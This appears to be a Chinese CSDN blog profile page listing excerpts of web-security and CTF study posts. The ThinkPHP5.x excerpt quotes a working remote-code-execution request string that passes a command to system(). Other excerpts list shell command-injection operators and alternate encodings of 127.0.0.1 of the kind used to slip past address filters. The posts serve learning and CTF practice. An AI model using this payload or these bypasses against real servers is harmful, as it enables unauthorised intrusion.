自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(7)
  • 收藏
  • 关注

原创 ThinkPHP5.x rec漏洞

漏洞详情由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31漏洞利用?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令].

2020-09-23 10:58:31 474

原创 CVE-2016-7124及反序列化漏洞学习

序列化和反序列化serialize ()serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。简单来讲,就是将对象转化为可以传输的字符串,字符串中存储着对象的变量、类型等。举例如下:<?php class test{ public $name = "wcute"; public $age = "18";}$fairy = new test();echo serialize($fairy); ?>unseri.

2020-09-23 09:30:24 329

原创 PHP弱类型比较漏洞

php中有两种比较符号=== 会同时比较字符串的值和类型== 会先将字符串换成相同类型,再作比较,属于弱类型比较PHP松散比较“==”的比较表PHP官网表格:http://php.net/manual/zh/types.comparisons.php举例<?phpvar_dump(1=="1");var_dump(123=='123asd');var_dump("1"==true);var_dump("0"==false);var_dump(-1 == true);.

2020-09-22 23:00:38 448

原创 页面允许命令执行漏洞

windows 或 linux 下:command1 && command2 先执行 command1,如果为真,再执行 command2command1 | command2 只执行 command2command1 & command2 先执行 command2 后执行 command1command1 || command2 先执行 command1,如果为假,再执行 command2命令执行漏洞(| || & && 称为 管道符)...

2020-09-22 20:37:40 109

原创 index.php的备份文件

文件名:index.php.bak

2020-09-22 20:33:51 1947

原创 127.0.0.1的备用地址

localhost127.0.0.12130706433017700000001

2020-09-21 13:39:33 1659

原创 CTF|BugkuCTF-WEB解题思路

截止至练习题【login4】,仅提供解题思路。WEB2按F12直接可得flag计算器:直接按F12,将maxlength修改,输入正确结果即可得到flagweb基础$_GETURL输入:http://123.206.87.240:8002/get/?what=flagweb基础$_POST使用hackbar工具,按F12,打开Post data,传递what=flag。矛盾这里是使用is_numeric遇到%00截断的漏洞,这里构造http://120.24.86.145:8002.

2020-06-15 13:47:21 1989

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除